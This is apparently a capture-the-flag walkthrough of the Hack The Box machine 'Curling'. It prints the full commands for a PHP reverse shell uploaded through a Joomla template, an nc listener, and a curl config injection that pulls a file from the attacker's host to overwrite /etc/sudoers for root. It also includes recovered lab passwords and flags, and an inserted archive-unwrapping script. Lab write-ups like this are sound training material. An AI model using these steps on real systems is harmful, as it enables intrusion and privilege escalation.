Hackthebox - Curling

Box information

Box type

Information gathering

Nmap

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.150
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-26 21:40 EDT
Nmap scan report for 10.10.10.150
Host is up (0.34s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/26%OT=22%CT=1%CU=41478%PV=Y%DS=2%DC=T%G=Y%TM=62689FB
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=2%ISR=10B%TI=Z%CI=Z%II=I%TS=C)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   338.76 ms 10.10.14.1
2   339.30 ms 10.10.10.150

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.76 seconds

HTTP

This box appears to be about curling. I looked around and found no obvious way in, and weak passwords did not get me logged in, so let's fuzz the web root.

Fuzz

┌──(root💀kali)-[~/Desktop]
└─# gobuster dir -u http://10.10.10.150/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 200 --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.150/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/27 01:33:22 Starting gobuster in directory enumeration mode
===============================================================
/media                (Status: 301) [Size: 312] [--> http://10.10.10.150/media/]
/templates            (Status: 301) [Size: 316] [--> http://10.10.10.150/templates/]
/images               (Status: 301) [Size: 313] [--> http://10.10.10.150/images/]   
/modules              (Status: 301) [Size: 314] [--> http://10.10.10.150/modules/]  
/bin                  (Status: 301) [Size: 310] [--> http://10.10.10.150/bin/]      
/plugins              (Status: 301) [Size: 314] [--> http://10.10.10.150/plugins/]  
/includes             (Status: 301) [Size: 315] [--> http://10.10.10.150/includes/] 
/language             (Status: 301) [Size: 315] [--> http://10.10.10.150/language/] 
/components           (Status: 301) [Size: 317] [--> http://10.10.10.150/components/]
/libraries            (Status: 301) [Size: 316] [--> http://10.10.10.150/libraries/] 
/cache                (Status: 301) [Size: 312] [--> http://10.10.10.150/cache/]     
/tmp                  (Status: 301) [Size: 310] [--> http://10.10.10.150/tmp/]       
/layouts              (Status: 301) [Size: 314] [--> http://10.10.10.150/layouts/]   
/administrator        (Status: 301) [Size: 320] [--> http://10.10.10.150/administrator/]
/cli                  (Status: 301) [Size: 310] [--> http://10.10.10.150/cli/]          
/server-status        (Status: 403) [Size: 277]                                         

===============================================================                                                                                                                                                    
2022/04/27 01:59:29 Finished
===============================================================

Check them one by one.

Under /administrator there is a Joomla login, but the version is unknown; a quick search shows Joomla has no default password, so keep looking.

</body>
      <!-- secret.txt -->
</html>

At the very bottom of the home page source, on line 359, there is a reference to a file, so let's look at it.

Q3VybGluZzIwMTgh

┌──(root💀kali)-[~/Desktop]
└─# echo Q3VybGluZzIwMTgh|base64 -d            
Curling2018!

I guess this is a password.

A username can also be taken from the home page (the first post is signed "- Floris"):

username = Floris
password = Curling2018!

The login on the front page succeeds, but there does not seem to be anything useful here, so let's try logging in to the Joomla administrator panel.

That login succeeds too. There is a lot here, so look around for a way in.

Exploitation

From the main page select Global → Media → Legal Extensions (File Types)

Then add the extension we need: php

After editing, click Save & Close

Next, use nc to listen on a port

nc -nvlp 4444

Then go to Extensions → Templates → Templates → Beez3 Details and Files

Then add a new file

https://github.com/LucifielHack/php-reverse-shell/blob/master/php-reverse-shell.php

Upload our reverse-shell.php (saved as shell.php in the template directory)

┌──(root💀kali)-[~/Desktop]
└─# curl http://10.10.10.150/templates/beez3/shell.php

Requesting the file triggers our shell:

┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444                                       
listening on [any] 4444 ...
connect to [10.10.16.12] from (UNKNOWN) [10.10.10.150] 40030
Linux curling 4.15.0-156-generic #163-Ubuntu SMP Thu Aug 19 23:31:58 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 06:24:26 up 31 min,  0 users,  load average: 0.06, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1262): Inappropriate ioctl for device
bash: no job control in this shell
www-data@curling:/$ whoami&&id
whoami&&id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We have a shell.

Next, upgrade the shell to a proper TTY:

python3 -c "import pty;pty.spawn('/bin/bash')"
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
stty rows 51 cols 237

Privilege escalation

User

www-data@curling:/home$ ls
floris
www-data@curling:/home$ cd floris
www-data@curling:/home/floris$ ls
admin-area  password_backup  user.txt

In /home/floris there is a directory, admin-area, and a file, password_backup.

We have no permission to enter the directory, but we can read the file.

www-data@curling:/home/floris$ cat password_backup 
00000000: 425a 6839 3141 5926 5359 819b bb48 0000  BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34  ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960  N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000   ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800  ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034  ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0  i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78  .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931  .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22  .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290  ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503  .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843  7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c  .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090  .G.. .U@r..rE8P.
000000f0: 819b bb48                                ...H

The content looks like gibberish, but it is an xxd hex dump, so reverse it with xxd -r and save it to a file:

www-data@curling:/home/floris$ xxd -r password_backup > /tmp/backup
www-data@curling:/home/floris$ cd /tmp
www-data@curling:/tmp$ file backup 
backup: bzip2 compressed data, block size = 900k

file reports bzip2 compressed data.

www-data@curling:/tmp$ mv backup backup.bz2
www-data@curling:/tmp$ bzip2 -d backup.bz2 
www-data@curling:/tmp$ ls
backup

Decompress it and look again.

www-data@curling:/tmp$ ls
backup
www-data@curling:/tmp$ file backup 
backup: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix

After decompression it turns out to be a gzip file, which has to be decompressed once more.

www-data@curling:/tmp$ mv backup backup.gz
www-data@curling:/tmp$ tar xvf backup.gz
www-data@curling:/tmp$ ls
backup.out
www-data@curling:/tmp$ file backup.out 
backup.out: POSIX tar archive (GNU)

This has to be unpacked several times, which got me a bit dizzy; I thought I was stuck in an infinite loop.

www-data@curling:/tmp$ mv backup.out backup.tar
www-data@curling:/tmp$ tar xvf backup.tar 
password.txt

Finally unpacked; look at the file.

www-data@curling:/tmp$ cat password.txt 
5d<wdCbdZu)|hChXll
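The chain above (xxd hex dump → bzip2 → gzip → tar → password.txt) is exactly the kind of thing that is worth automating, because the manual loop is where the author lost track. The script below is an added example, not part of the original writeup: it implements an `xxd -r` equivalent, sniffs each layer by magic bytes the way `file` does, and peels layers until it reaches a tar archive or plain data. The sample dump is constructed inline with a placeholder secret, not the box's real password_backup, and the layer cap guards against a decompression bomb or an endless loop.

```python
"""Unwrap a nested archive: xxd hex dump -> bzip2 -> gzip -> tar -> file.
Added example (not from the writeup); the sample archive is constructed inline."""
import bz2
import gzip
import io
import tarfile


def xxd_reverse(dump: str) -> bytes:
    """Equivalent of `xxd -r` for default xxd output:
    '00000000: 425a 6839 ...  BZh9...' -> raw bytes (ASCII column ignored)."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        # hex columns sit between the offset colon and the first double space
        hex_part = line.split(":", 1)[1].split("  ", 1)[0]
        out += bytes.fromhex(hex_part)  # fromhex ignores the single spaces
    return bytes(out)


def identify(blob: bytes) -> str:
    """Minimal `file`-style sniffing by magic bytes, enough for this chain."""
    if blob.startswith(b"BZh"):
        return "bzip2"
    if blob.startswith(b"\x1f\x8b"):
        return "gzip"
    if len(blob) >= 262 and blob[257:262] == b"ustar":
        return "tar"
    return "data"


def unwrap(blob: bytes, max_layers: int = 10) -> dict:
    """Peel compression layers until a tar archive or plain data is reached.
    Returns {member name: content}; plain data is returned under '<raw>'.
    max_layers stops a decompression bomb or a never-ending chain."""
    for _ in range(max_layers):
        kind = identify(blob)
        if kind == "bzip2":
            blob = bz2.decompress(blob)
        elif kind == "gzip":
            blob = gzip.decompress(blob)
        elif kind == "tar":
            with tarfile.open(fileobj=io.BytesIO(blob), mode="r:") as tf:
                return {m.name: tf.extractfile(m).read()
                        for m in tf.getmembers() if m.isfile()}
        else:
            return {"<raw>": blob}
    raise ValueError("too many layers, refusing to continue")


def build_sample_dump(secret: bytes = b"placeholder-password") -> str:
    """Constructed sample: tar(password.txt) -> gzip -> bzip2 -> xxd-style dump.
    Mirrors the structure of the box's password_backup with a placeholder secret."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tf.addfile(info, io.BytesIO(secret))
    layered = bz2.compress(gzip.compress(buf.getvalue()))
    lines = []
    for off in range(0, len(layered), 16):
        chunk = layered[off:off + 16]
        hexcol = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        ascii_col = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hexcol:<39}  {ascii_col}")
    return "\n".join(lines)


if __name__ == "__main__":
    dump = build_sample_dump()
    raw = xxd_reverse(dump)
    print("outer layer:", identify(raw))
    for name, content in unwrap(raw).items():
        print(name, "->", content)
```

Run it as-is to see the constructed dump unwrapped; to use it on a real dump, feed the text of the hex file to `xxd_reverse` and pass the bytes to `unwrap`.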

This looks like the password for user floris, so try logging in over ssh.

┌──(root💀kali)-[~/Desktop]
└─# ssh floris@10.10.10.150       
The authenticity of host '10.10.10.150 (10.10.10.150)' can't be established.
ECDSA key fingerprint is SHA256:o1Cqn+GlxiPRiKhany4ZMStLp3t9ePE9GjscsUsEjWM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.150' (ECDSA) to the list of known hosts.
floris@10.10.10.150's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-156-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Apr 28 06:53:07 UTC 2022

  System load:  0.0               Processes:            172
  Usage of /:   49.2% of 9.78GB   Users logged in:      0
  Memory usage: 25%               IP address for ens33: 10.10.10.150
  Swap usage:   0%

0 updates can be applied immediately.

Last login: Wed Sep  8 11:42:07 2021 from 10.10.14.15
floris@curling:~$ whoami&&id
floris
uid=1000(floris) gid=1004(floris) groups=1004(floris)

We now have a shell as the user-level account floris.

floris@curling:~$ cat user.txt 
65dd1df0713b40d88ead98cf11b8530b

That gives us the user flag.

Root

floris@curling:~$ sudo -l
[sudo] password for floris: 
Sorry, user floris may not run sudo on curling.

sudo -l gives nothing, so let's focus on the admin-area directory instead.

floris@curling:~/admin-area$ ls -la
total 28
drwxr-x--- 2 root   floris  4096 May 22  2018 .
drwxr-xr-x 6 floris floris  4096 May 22  2018 ..
-rw-rw---- 1 root   floris    25 Apr 28 06:55 input
-rw-rw---- 1 root   floris 14236 Apr 28 06:55 report

There are two files here, and we have both read and write permission on them.

floris@curling:~/admin-area$ cat input 
url = "http://127.0.0.1"
floris@curling:~/admin-area$ cat report 
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <meta charset="utf-8" />
        <base href="http://127.0.0.1/" />
        <meta name="description" content="best curling site on the planet!" />
        <meta name="generator" content="Joomla! - Open Source Content Management" />
        <title>Home</title>
        <link href="/index.php?format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
        <link href="/index.php?format=feed&type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" />
        <link href="/templates/protostar/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />
        <link href="/templates/protostar/css/template.css?b6bf078482bc6a711b54fa9e74e19603" rel="stylesheet" />
        <link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />
        <style>

        h1, h2, h3, h4, h5, h6, .site-title {
                font-family: 'Open Sans', sans-serif;
        }
        </style>
        <script type="application/json" class="joomla-script-options new">{"csrf.token":"e6b8a82d84a03e7e05d6452f52f975f7","system.paths":{"root":"","base":""},"system.keepalive":{"interval":840000,"uri":"\/index.php\/component\/ajax\/?format=json"}}</script>
        <script src="/media/jui/js/jquery.min.js?b6bf078482bc6a711b54fa9e74e19603"></script>
        <script src="/media/jui/js/jquery-noconflict.js?b6bf078482bc6a711b54fa9e74e19603"></script>
        <script src="/media/jui/js/jquery-migrate.min.js?b6bf078482bc6a711b54fa9e74e19603"></script>
        <script src="/media/system/js/caption.js?b6bf078482bc6a711b54fa9e74e19603"></script>
        <script src="/media/jui/js/bootstrap.min.js?b6bf078482bc6a711b54fa9e74e19603"></script>
        <script src="/templates/protostar/js/template.js?b6bf078482bc6a711b54fa9e74e19603"></script>
        <!--[if lt IE 9]><script src="/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
        <script src="/media/system/js/core.js?b6bf078482bc6a711b54fa9e74e19603"></script>
        <!--[if lt IE 9]><script src="/media/system/js/polyfill.event.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
        <script src="/media/system/js/keepalive.js?b6bf078482bc6a711b54fa9e74e19603"></script>
        <script>
jQuery(window).on('load',  function() {
                                new JCaption('img.caption');
jQuery(function($){ initTooltips(); $("body").on("subform-row-add", initTooltips); function initTooltips (event, container) { container = container || document;$(container).find(".hasTooltip").tooltip({"html": true,"container": "body"});} });
        </script>

</head>
<body class="site com_content view-featured no-layout no-task itemid-101">
        <!-- Body -->
        <div class="body" id="top">
                <div class="container">
                        <!-- Header -->
                        <header class="header" role="banner">
                                <div class="header-inner clearfix">
                                        <a class="brand pull-left" href="/">
                                                <span class="site-title" title="Cewl Curling site!">Cewl Curling site!</span>                                                                                   </a>
                                        <div class="header-search pull-right">

                                        </div>
                                </div>
                        </header>

                        <div class="row-fluid">
                                                                <main id="content" role="main" class="span9">
                                        <!-- Begin Content -->

                                        <div id="system-message-container">
        </div>

                                        <div class="blog-featured" itemscope itemtype="https://schema.org/Blog">
<div class="page-header">
        <h1>
        Home    </h1>
</div>

<div class="items-leading clearfix">
                        <div class="leading-0 clearfix"
                        itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">

        <h2 class="item-title" itemprop="headline">
                        <a href="/index.php/2-uncategorised/3-what-s-the-object-of-curling" itemprop="url">
                        What's the object of curling?           </a>
                </h2>

<div class="icons">

                                        <div class="btn-group pull-right">
                                <button class="btn dropdown-toggle" type="button" id="dropdownMenuButton-3" aria-label="User tools"
                                data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                                        <span class="icon-cog" aria-hidden="true"></span>
                                        <span class="caret" aria-hidden="true"></span>
                                </button>
                                                                <ul class="dropdown-menu" aria-labelledby="dropdownMenuButton-3">
                                                                                        <li class="print-icon"> <a href="/index.php/2-uncategorised/3-what-s-the-object-of-curling?tmpl=component&print=1" title="Print article < What's the object of curling? >" onclick="window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no'); return false;" rel="nofollow">                 <span class="icon-print" aria-hidden="true"></span>
                Print   </a> </li>
                                                                                                                                                        </ul>
                        </div>

        </div>

                        <dl class="article-info muted">

                        <dt class="article-info-term">
                                                                        Details                                                 </dt>

                                                        <dd class="createdby" itemprop="author" itemscope itemtype="https://schema.org/Person">
                                        Written by <span itemprop="name">Super User</span>      </dd>

                                                                                <dd class="category-name">
                                                                                                                                                Category: <a href="/index.php/2-uncategorised" itemprop="genre">Uncategorised</a>                                                  </dd>

                                                                                <dd class="published">
                                <span class="icon-calendar" aria-hidden="true"></span>
                                <time datetime="2018-05-22T18:54:21+00:00" itemprop="datePublished">
                                        Published: 22 May 2018                          </time>
                        </dd>

                                                                                <dd class="hits">
                                        <span class="icon-eye-open" aria-hidden="true"></span>
                                        <meta itemprop="interactionCount" content="UserPageVisits:5" />
                                        Hits: 5                 </dd>                                           </dl>

<p>Good question. First, let's get a bit of the jargon down. The playing surface in curling is called "the sheet." Sheet dimensions can vary, but they're usually around 150 feet long by about 15 feet wide. The sheet is covered with tiny droplets of water that become ice and cause the stones to "curl," or deviate from a straight path. These water droplets are known as "pebble."</p>

                </div>
                        </div>

                <div class="items-row cols-3 row-0 row-fluid">
                                        <div class="item column-1 span4"
                                itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">

        <h2 class="item-title" itemprop="headline">
                        <a href="/index.php/2-uncategorised/2-curling-you-know-its-true" itemprop="url">
                        Curling you know its true!              </a>
                </h2>

<div class="icons">

                                        <div class="btn-group pull-right">
                                <button class="btn dropdown-toggle" type="button" id="dropdownMenuButton-2" aria-label="User tools"
                                data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                                        <span class="icon-cog" aria-hidden="true"></span>
                                        <span class="caret" aria-hidden="true"></span>
                                </button>
                                                                <ul class="dropdown-menu" aria-labelledby="dropdownMenuButton-2">
                                                                                        <li class="print-icon"> <a href="/index.php/2-uncategorised/2-curling-you-know-its-true?tmpl=component&print=1" title="Print article < Curling you know its true! >" onclick="window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no'); return false;" rel="nofollow">                    <span class="icon-print" aria-hidden="true"></span>
                Print   </a> </li>
                                                                                                                                                        </ul>
                        </div>

        </div>

                        <dl class="article-info muted">

                        <dt class="article-info-term">
                                                                        Details                                                 </dt>

                                                        <dd class="createdby" itemprop="author" itemscope itemtype="https://schema.org/Person">
                                        Written by <span itemprop="name">Super User</span>      </dd>

                                                                                <dd class="category-name">
                                                                                                                                                Category: <a href="/index.php/2-uncategorised" itemprop="genre">Uncategorised</a>                                                  </dd>

                                                                                <dd class="published">
                                <span class="icon-calendar" aria-hidden="true"></span>
                                <time datetime="2018-05-22T18:53:17+00:00" itemprop="datePublished">
                                        Published: 22 May 2018                          </time>
                        </dd>

                                                                                <dd class="hits">
                                        <span class="icon-eye-open" aria-hidden="true"></span>
                                        <meta itemprop="interactionCount" content="UserPageVisits:4" />
                                        Hits: 4                 </dd>                                           </dl>

<p>Curling is absolutely the best sport to watch on television, particularly for viewers looking for an escape from the frantic "more, faster, bigger, higher" grind of most televised games. Watching basketball or hockey can get you so hyped up, you feel like drinking a Red Bull and doing jumping jacks. Watching curling makes you want to drink a glass of red wine and lie down on the shag carpet. Curling is deliberate. Thoughtful, even. The games move very slowly. The players spend a lot of time talking strategy. There are nods and quiet words of encouragement; rarely are there disagreements. When it comes time for a team member to play their turn by sliding a stone down the ice, the moves are elegant. There's a wind up, a push-off, a slide, and a gentle release. Such poise and finesse!</p>

                        </div>

                                        <div class="item column-2 span4"
                                itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">

        <h2 class="item-title" itemprop="headline">
                        <a href="/index.php/2-uncategorised/1-first-post-of-curling2018" itemprop="url">
                        My first post of curling in 2018!               </a>
                </h2>

<div class="icons">

                                        <div class="btn-group pull-right">
                                <button class="btn dropdown-toggle" type="button" id="dropdownMenuButton-1" aria-label="User tools"
                                data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                                        <span class="icon-cog" aria-hidden="true"></span>
                                        <span class="caret" aria-hidden="true"></span>
                                </button>
                                                                <ul class="dropdown-menu" aria-labelledby="dropdownMenuButton-1">
                                                                                        <li class="print-icon"> <a href="/index.php/2-uncategorised/1-first-post-of-curling2018?tmpl=component&print=1" title="Print article < My first post of curling in 2018! >" onclick="window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no'); return false;" rel="nofollow">                     <span class="icon-print" aria-hidden="true"></span>
                Print   </a> </li>
                                                                                                                                                        </ul>
                        </div>

        </div>

                        <dl class="article-info muted">

                        <dt class="article-info-term">
                                                                        Details                                                 </dt>

                                                        <dd class="createdby" itemprop="author" itemscope itemtype="https://schema.org/Person">
                                        Written by <span itemprop="name">Super User</span>      </dd>

                                                                                <dd class="category-name">
                                                                                                                                                Category: <a href="/index.php/2-uncategorised" itemprop="genre">Uncategorised</a>                                                  </dd>

                                                                                <dd class="published">
                                <span class="icon-calendar" aria-hidden="true"></span>
                                <time datetime="2018-05-22T18:51:53+00:00" itemprop="datePublished">
                                        Published: 22 May 2018                          </time>
                        </dd>

                                                                                <dd class="hits">
                                        <span class="icon-eye-open" aria-hidden="true"></span>
                                        <meta itemprop="interactionCount" content="UserPageVisits:4" />
                                        Hits: 4                 </dd>                                           </dl>

<p>Hey this is the first post on this amazing website! Stay tuned for more amazing content! curling2018 for the win!</p>
<p>- Floris</p>

                        </div>

                </div>

</div>

                                        <div class="clearfix"></div>

<ul itemscope itemtype="https://schema.org/BreadcrumbList" class="breadcrumb">
                        <li>
                        You are here:  
                </li>

                                <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" class="active">
                                <span itemprop="name">
                                        Home                            </span>
                                <meta itemprop="position" content="1">
                        </li>
                </ul>

                                        <!-- End Content -->
                                </main>
                                                                        <div id="aside" class="span3">
                                                <!-- Begin Right Sidebar -->
                                                <div class="well _menu"><h3 class="page-header">Main Menu</h3><ul class="nav menu">
<li class="item-101 default current active"><a href="/index.php" >Home</a></li></ul>
</div><div class="well "><h3 class="page-header">Login Form</h3><form action="/index.php" method="post" id="login-form" class="form-inline">
                <div class="userdata">
                <div id="form-login-username" class="control-group">
                        <div class="controls">
                                                                        <div class="input-prepend">
                                                <span class="add-on">
                                                        <span class="icon-user hasTooltip" title="Username"></span>
                                                        <label for="modlgn-username" class="element-invisible">Username</label>
                                                </span>
                                                <input id="modlgn-username" type="text" name="username" class="input-small" tabindex="0" size="18" placeholder="Username" />
                                        </div>
                                                        </div>
                </div>
                <div id="form-login-password" class="control-group">
                        <div class="controls">
                                                                        <div class="input-prepend">
                                                <span class="add-on">
                                                        <span class="icon-lock hasTooltip" title="Password">
                                                        </span>
                                                                <label for="modlgn-passwd" class="element-invisible">Password                                                   </label>
                                                </span>
                                                <input id="modlgn-passwd" type="password" name="password" class="input-small" tabindex="0" size="18" placeholder="Password" />
                                        </div>
                                                        </div>
                </div>
                                                <div id="form-login-remember" class="control-group checkbox">
                        <label for="modlgn-remember" class="control-label">Remember Me</label> <input id="modlgn-remember" type="checkbox" name="remember" class="inputbox" value="yes"/>
                </div>
                                <div id="form-login-submit" class="control-group">
                        <div class="controls">
                                <button type="submit" tabindex="0" name="Submit" class="btn btn-primary login-button">Log in</button>
                        </div>
                </div>
                                        <ul class="unstyled">
                                                        <li>
                                        <a href="/index.php/component/users/?view=remind&Itemid=101">
                                        Forgot your username?</a>
                                </li>
                                <li>
                                        <a href="/index.php/component/users/?view=reset&Itemid=101">
                                        Forgot your password?</a>
                                </li>
                        </ul>
                <input type="hidden" name="option" value="com_users" />
                <input type="hidden" name="task" value="user.login" />
                <input type="hidden" name="return" value="aHR0cDovLzEyNy4wLjAuMS8=" />
                <input type="hidden" name="e6b8a82d84a03e7e05d6452f52f975f7" value="1" />       </div>
        </form>
</div>
                                                <!-- End Right Sidebar -->
                                        </div>
                                                        </div>
                </div>
        </div>
        <!-- Footer -->
        <footer class="footer" role="contentinfo">
                <div class="container">
                        <hr />

                        <p class="pull-right">
                                <a href="#top" id="back-top">
                                        Back to Top                             </a>
                        </p>
                        <p>
                                © 2022 Cewl Curling site!                  </p>
                </div>
        </footer>

</body>
      <!-- secret.txt -->
</html>

I did not quite understand what this means at first, but input points at a local URL, so let's request it and see.

curl http://127.0.0.1

The response is the content of report, which is also the home page.

floris@curling:~/admin-area$ ls -la
total 28
drwxr-x--- 2 root   floris  4096 May 22  2018 .
drwxr-xr-x 6 floris floris  4096 May 22  2018 ..
-rw-rw---- 1 root   floris    25 Apr 28 06:55 input
-rw-rw---- 1 root   floris 14236 Apr 28 06:55 report
floris@curling:~/admin-area$ ls -la
total 28
drwxr-x--- 2 root   floris  4096 May 22  2018 .
drwxr-xr-x 6 floris floris  4096 May 22  2018 ..
-rw-rw---- 1 root   floris    25 Apr 28 07:02 input
-rw-rw---- 1 root   floris 14236 Apr 28 07:02 report

Comparing the two listings, the timestamps change: both files are being rewritten periodically.

Run pspy64 to see what is doing it:

2022/04/28 07:16:01 CMD: UID=0    PID=16262  | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 
2022/04/28 07:16:01 CMD: UID=0    PID=16261  | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input 
2022/04/28 07:16:01 CMD: UID=0    PID=16260  | /usr/sbin/CRON -f 
2022/04/28 07:16:01 CMD: UID=0    PID=16259  | /usr/sbin/CRON -f 
2022/04/28 07:16:01 CMD: UID=0    PID=16264  | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 
2022/04/28 07:16:13 CMD: UID=0    PID=16266  | 
2022/04/28 07:17:01 CMD: UID=0    PID=16274  | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 
2022/04/28 07:17:01 CMD: UID=0    PID=16272  | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

We can see that root runs this curl every few seconds via cron, reading its options from /home/floris/admin-area/input (curl -K), so we can write malicious content into input to get a shell.

Build a malicious exploit file locally:

┌──(root💀kali)-[/opt/tools]
└─# cat exploit                       
root    ALL=(ALL:ALL) ALL
floris  ALL=(ALL:ALL) ALL

Then start an HTTP server with python3:

python3 -m http.server 80

Then run the following command on the target:

echo -e 'url = "http://10.10.16.12/exploit"\noutput = "/etc/sudoers"' > input

Then just wait.

┌──(root💀kali)-[/opt/tools]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.150 - - [28/Apr/2022 03:23:03] "GET /exploit HTTP/1.1" 200 -

Once the request shows up on our HTTP server, the file has been overwritten.

Then use sudo su to switch to root; the password is still floris's password.

floris@curling:~/admin-area$ sudo su
[sudo] password for floris: 
root@curling:/home/floris/admin-area# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

We are root.

root@curling:/home/floris/admin-area# cat /root/root.txt
82c198ab6fc5365fdc6da2ee5c26064a

And that gives us the root flag.